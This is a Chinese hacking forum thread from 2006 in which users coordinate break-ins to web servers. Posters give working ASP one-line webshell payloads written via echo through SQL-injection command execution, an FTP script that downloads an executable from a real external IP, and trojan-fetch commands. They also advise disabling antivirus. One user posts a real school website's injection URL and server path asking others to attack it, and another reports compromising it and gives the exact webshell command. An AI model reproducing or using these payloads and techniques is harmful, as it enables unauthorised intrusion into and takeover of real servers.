无法上传文件吗？
你找到网站的路径没有？
如果找到了的话
上传一个一句话木马进去，然后写一个端口复用的SHELL，占领80端口
基本上机器就是你的了，那样可能方便得多吧
可能是防火墙限制了哟

后补充：如果好点的防火墙可能还会检测是不是HTTP协议，不是HTTP协议的话可能就还不能让你通行，所以你最好上传一个模仿HTTP协议的后门哦。
                                        感谢ZV大哥给我提醒！

写FTP或者下载VBS试试.

晕,又看了一下,可以将文件拷到WEB目录下,还能访问,还搞不定吗?ECHO,写一个小马上去,拷到WEB目录,利用小马传木马或者别的工具,在CADT里再执行,上面两种方式也行,不一定非用TFTP.
另:
IP ： 172.16.1.66
地址： 局域网  CZ88.NET

引用:

这里是引用第[4 楼]的十三豆子于2006-03-09 19:09发表的：
晕,又看了一下,可以将文件拷到WEB目录下,还能访问,还搞不定吗?ECHO,写一个小马上去,拷到WEB目录,利用小马传木马或者别的工具,在CADT里再执行,上面两种方式也行,不一定非用TFTP.

echo xxx >e:\web\shell.asp
这样方便多了`````然后webshell和SA结合起来！

172.16.1.66,是b类私有地址,
估计是虚拟主机

有可能是内网SQL＋WEB的架构啊
那样的话就难搞啦
我现在也遇到个和你相似的问题啦

可执行任意系统命令！？那就很好搞了啊！如楼上那个同志所说的FTP下载 VBS下载啊！直接拿下服务器就行了``还上传脚本做咩啊！！

引用:

这里是引用第[5 楼]的堕落青年于2006-03-09 19:14发表的：

echo xxx >e:webshell.asp
这样方便多了`````然后webshell和SA结合起来！

楼主不是可以执行命令吗？
这个命令都不行吗？
我之所以不谈内网外网的事情
是因为，用占领80端口的方法
就算是内网，也应该出得来端口啊

[s:75] 上Q M我，我帮你搞，包搞死 [s:82]

搞这个简单要死，我直接把服务器给你日下就行~

上传方面能上网就好办~三五分钟的事~

往WEB目录丢马~这个比较快点，或者用VBS下个lcx过去映射下~

引用:

这里是引用第[12 楼]的又一天于2006-03-09 23:16发表的：
看到楼上的ID，把我惊讶死了`那个是不能写进SHELL的似乎`因为会提示
:www.asp
此时不应有 >。

这里其实很容易，用echo写一句话到网站目录！举个例子：
一句话服务端<%eval request("ssjk")%>，网站目录d:\wwwroot\
那么用echo来写就应该是这样的
echo ^<%25eval request("ssjk")%25^>  >d:\wwwroot\ssjk.asp

  至少那个用TFTP和VBS来下载我个人觉得都不太好！TFTP是不可靠的，传输数据大了可能丢包。VBS我估计很多杀毒软件会订上他！我觉得用TXT更好！举例：
echo open 61.157.150.21 >ssjk.txt
echo 用户名 >>ssjk.txt
echo 密码 >>ssjk.txt
echo get down.exe >>ssjk.txt
echo quit >>ssjk.txt

然后执行ftp -s:ssjk.txt
提示：>>有的时候执行一次写进去就变成了两次了，为了避免这种情况，可以分别写成多个文本文件，再用copy成一个文件！

很少回贴！如有出错，敬请指出，谢谢！

copy这个难成，我试过，没一次行的。在注射的情况下执行命令不行，本机CMD能行~
杀毒软件有毛用，关了就是。。。。这种类型的站算是N好搞的。echo 写ASP小马要转义才行滴，嘿嘿。

CMD下 start iis:http://www.xxx.com/1.exe 下载你的马,然后运行!用这个试下!

引用:

这里是引用第[13 楼]的hack520于2006-03-10 07:10发表的：
[s:75] 上Q M我，我帮你搞，包搞死 [s:82]

搞这个简单要死，我直接把服务器给你日下就行~

上传方面能上网就好办~三五分钟的事~
.......

------------
确实是3.5分钟的事,不知道为什么搞的那么复杂,方法太多了.....

如楼主还不会,直接M我.

另:copy也可以.除非服务器锁住C盘.

引用:

这里是引用第[18 楼]的又一天于2006-03-10 16:28发表的：
服务器上3个盘`C/D/E，每个盘下，都有一个一摸一样的WEB目录，但我在每个文件夹里都建了，都发现不是WEB目录，然后在一个名为d backup hnzz的文件夹里发现WEB目录，当我在这个WEB目录修改了一个ASP文件的内容（替换了海洋2006），结果显示这页无法访问，但文件存在，并未被杀。之前我已经删除了杀毒软件。
.......

这样的奇怪问题我也碰到过不少！有一次用差异备份搞一网站。备份出来的文件无法显示,(确定是网站目录)。然后备份成网站里正常存在的一个文件，再打开，结果也无法显示，还有一次在入侵SOHU一分站的时候，马传上去了！但是网站目录下读不出一个文件，什么马都换了，一样的效果。。奇怪的事，如果目录读权限都没有，为什么网站又能正常访问呢？

那我还在一个台湾站上上传EXE文件 文件上去了可以看到结果下载时就说没有这个文件捏，。。。。

引用:

这里是引用第[22 楼]的easylun10于2006-03-12 16:43发表的：
那我还在一个台湾站上上传EXE文件 文件上去了可以看到结果下载时就说没有这个文件捏，。。。。

可能03的机子限制100K以上的文件上传，你用webshell的下载功能传

我也郁闷.和楼主的问题差不多.我用目录浏览找到了一些文件夹.都是返回:http500.不知道是何原因.例如http://www.abc.com/aa/bb/cc/dd/1.htm可以正常访问!
但是:
http://www.abc.com/aa/bb/的话.提示是http500.
不知道这是什么原因.我想,第一个地址能正常访问的话.第二个也不应该是HTTP500啊.应该是http403的错误吧!


我在SA权限下用EHCO写了文件.但是不能写进WEB目录中.只可以写进:c:\winnt\temp或者:c:\winnt\system32\inetsrv\data\目录中.写进去后.用copy,rename等命令写弄它到WEB目录.但是均不成功.用NC改为JPG文件上传上去后.用AD的注入工具的CMD功能执行命令来反弹SHELL也不行.
但是用PING命令来PING我本地的IP确定数据库和WEB是同一服务器.

不知道用什么方法才能解决.

http://www2.tlyz.net/ct/soundweb/website_title.asp?id=2
站点物理路径：e:\Program Files\Eternity Science\SPIRIT专题学习网站\ct\

注入地址和物理路径如上.希望能攻下的朋友帮帮忙.谢谢.!!!

楼上说：可执行任意系统命令。
还用来这里发帖吗？这不等于Cmdshell了吗~

to 天使娃娃。你给的站点进去了，注入地址具有sa权限，xpcmdshell扩展可用。
你碰到的问题是长文件名带空格路径。采用 引号就能解决
echo ^<%25if request("eers")^<^>"" then execute request("eers")%25^> >"e:\Program Files\Eternity Science\SPIRIT专题学习网站\ct\ct.asp"